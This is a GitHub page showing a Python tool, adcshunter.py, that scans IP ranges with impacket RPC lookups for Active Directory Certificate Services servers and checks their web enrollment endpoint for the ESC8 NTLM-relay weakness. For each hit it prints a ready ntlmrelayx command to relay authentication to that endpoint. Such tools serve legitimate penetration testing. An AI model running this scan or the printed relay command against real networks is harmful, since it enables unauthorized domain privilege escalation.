-
Notifications
You must be signed in to change notification settings - Fork 7
/
adcshunter.py
255 lines (218 loc) · 9.03 KB
/
adcshunter.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
import argparse
import threading
import queue
import ipaddress
import os
import requests
import logging
import socket
from impacket import uuid
from impacket.dcerpc.v5 import transport, epm
# Set default socket timeout to 5 seconds
socket.setdefaulttimeout(5)
# ANSI color codes
RED = '\033[91m'
RESET = '\033[0m'
# Initialize logging
logging.basicConfig(level=logging.CRITICAL) # Suppress all logging output
# Global print lock and vulnerable targets list
print_lock = threading.Lock()
vulnerable_targets = []
vulnerable_targets_lock = threading.Lock()
def make_http_request(ip):
url = f"http://{ip}/certsrv/certfnsh.asp"
try:
response = requests.get(url, timeout=5) # Reduced timeout to 5 seconds
if response.status_code == 401 and "Access is denied" in response.text:
return True, None # Indicates potential vulnerability
else:
return False, None
except requests.RequestException:
return False, None
def parse_input_line(line):
line = line.strip()
if not line:
return []
try:
if '/' in line:
return [str(ip) for ip in ipaddress.ip_network(line, strict=False)]
else:
ipaddress.ip_address(line)
return [line]
except ValueError:
# Line is not an IP address or CIDR, assume it's a hostname
return [line]
class RPCDump:
KNOWN_PROTOCOLS = {
135: {'bindstr': r'ncacn_ip_tcp:%s[135]'},
139: {'bindstr': r'ncacn_np:%s[\pipe\epmapper]'},
443: {'bindstr': r'ncacn_http:[593,RpcProxy=%s:443]'},
445: {'bindstr': r'ncacn_np:%s[\pipe\epmapper]'},
593: {'bindstr': r'ncacn_http:%s'}
}
def __init__(self, username='', password='', domain='', hashes=None, port=135):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__port = port
self.__stringbinding = ''
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def dump(self, remoteName, remoteHost):
entries = []
self.__stringbinding = self.KNOWN_PROTOCOLS[self.__port]['bindstr'] % remoteName
rpctransport = transport.DCERPCTransportFactory(self.__stringbinding)
if self.__port in [139, 445]:
rpctransport.set_credentials(self.__username, self.__password, self.__domain,
self.__lmhash, self.__nthash)
rpctransport.setRemoteHost(remoteHost)
rpctransport.set_dport(self.__port)
elif self.__port in [443]:
rpctransport.set_credentials(self.__username, self.__password, self.__domain,
self.__lmhash, self.__nthash)
rpctransport.set_auth_type(transport.HTTPTransport.AUTH_NTLM)
try:
entries = self.__fetchList(rpctransport)
except Exception:
pass # Suppress exceptions to reduce verbose output
return entries
def __fetchList(self, rpctransport):
# Set a timeout on the transport
try:
rpctransport.set_connect_timeout(5) # Set transport timeout to 5 seconds
except AttributeError:
pass # Not all transports support this method
dce = rpctransport.get_dce_rpc()
try:
dce.set_rpc_timeout(5) # Set RPC timeout to 5 seconds
except AttributeError:
pass # Not all DCE/RPC connections support this method
dce.connect()
resp = epm.hept_lookup(None, dce=dce)
dce.disconnect()
return resp
def worker(ip_queue, progress):
while True:
ip = ip_queue.get()
if ip is None:
ip_queue.task_done()
break
# Initialize a list to accumulate messages
output_messages = []
# Output the IP or hostname currently being tested
output_messages.append(f"Testing {ip}")
found_vulnerable = False # Flag to check if vulnerability was found
try:
dumper = RPCDump(port=135)
entries = dumper.dump(ip, ip)
if entries:
endpoints = {}
for entry in entries:
binding = epm.PrintStringBinding(entry['tower']['Floors'])
tmpUUID = str(entry['tower']['Floors'][0])
if tmpUUID not in endpoints:
endpoints[tmpUUID] = {}
endpoints[tmpUUID]['Bindings'] = []
uuid_bin = uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18]
if uuid_bin in epm.KNOWN_UUIDS:
endpoints[tmpUUID]['EXE'] = epm.KNOWN_UUIDS[uuid_bin]
else:
endpoints[tmpUUID]['EXE'] = 'N/A'
endpoints[tmpUUID]['annotation'] = entry['annotation'][:-1].decode('utf-8')
endpoints[tmpUUID]['Bindings'].append(binding)
# Check if 'certsrv.exe' is among the endpoints
for endpoint in endpoints:
exe_name = endpoints[endpoint]['EXE'].lower()
if 'certsrv.exe' in exe_name:
output_messages.append(f"\nADCS Server identified on {ip}")
output_messages.append(f"Checking for ESC8 vulnerability on {ip}")
is_vulnerable, _ = make_http_request(ip)
if is_vulnerable:
output_messages.append(f"{RED}Vulnerable Web Enrollment endpoint found: http://{ip}/certsrv/certfnsh.asp{RESET}\n")
# Add the vulnerable target to the list
with vulnerable_targets_lock:
vulnerable_targets.append(ip)
found_vulnerable = True
else:
output_messages.append(f"No vulnerability found on {ip}\n")
break # Exit after finding certsrv.exe
else:
pass # No endpoints found; do not output
except Exception:
pass # Suppress exceptions to reduce verbose output
finally:
# Print all messages at once
with print_lock:
print('\n'.join(output_messages))
with progress.get_lock():
progress.value += 1
ip_queue.task_done()
def run_rpcdump_concurrently(ip_list):
num_worker_threads = 10
ip_queue = queue.Queue()
class Progress:
def __init__(self, total):
self.value = 0
self.total = total
self._lock = threading.Lock()
def get_lock(self):
return self._lock
progress = Progress(len(ip_list))
threads = []
for _ in range(num_worker_threads):
t = threading.Thread(target=worker, args=(ip_queue, progress))
t.start()
threads.append(t)
try:
for ip in ip_list:
ip_queue.put(ip.strip())
ip_queue.join()
# Signal threads to exit
for _ in range(num_worker_threads):
ip_queue.put(None)
for t in threads:
t.join()
except KeyboardInterrupt:
for _ in range(num_worker_threads):
ip_queue.put(None)
for t in threads:
t.join()
def main():
try:
parser = argparse.ArgumentParser(description='Script to scan for vulnerable Web Enrollment endpoints.')
parser.add_argument('-t', '--target', required=True, help='File path, CIDR range, IP address, or hostname to scan.')
args = parser.parse_args()
user_input = args.target
if os.path.isfile(user_input):
ip_list = []
with open(user_input, 'r') as file:
for line in file:
ip_list.extend(parse_input_line(line.strip()))
# Remove duplicate IPs
ip_list = list(set(ip_list))
run_rpcdump_concurrently(ip_list)
else:
ip_list = parse_input_line(user_input)
if ip_list:
ip_list = list(set(ip_list))
run_rpcdump_concurrently(ip_list)
else:
print("Invalid input. Please enter a valid file path, CIDR range, IP address, or hostname.")
# After scanning is complete, output the command if vulnerabilities were found
if vulnerable_targets:
with print_lock:
print(f"\n{RED}Vulnerable targets found:{RESET}")
for target in vulnerable_targets:
print(f" - {target}")
print(f"\nYou can use the following command(s):")
for target in vulnerable_targets:
print(f"{RED}impacket-ntlmrelayx -t http://{target}/certsrv/certfnsh.asp -smb2support --adcs --template 'user'{RESET}")
else:
with print_lock:
print("\nNo vulnerable targets were found.")
except KeyboardInterrupt:
print("\nOperation interrupted by user. Exiting gracefully.")
if __name__ == "__main__":
main()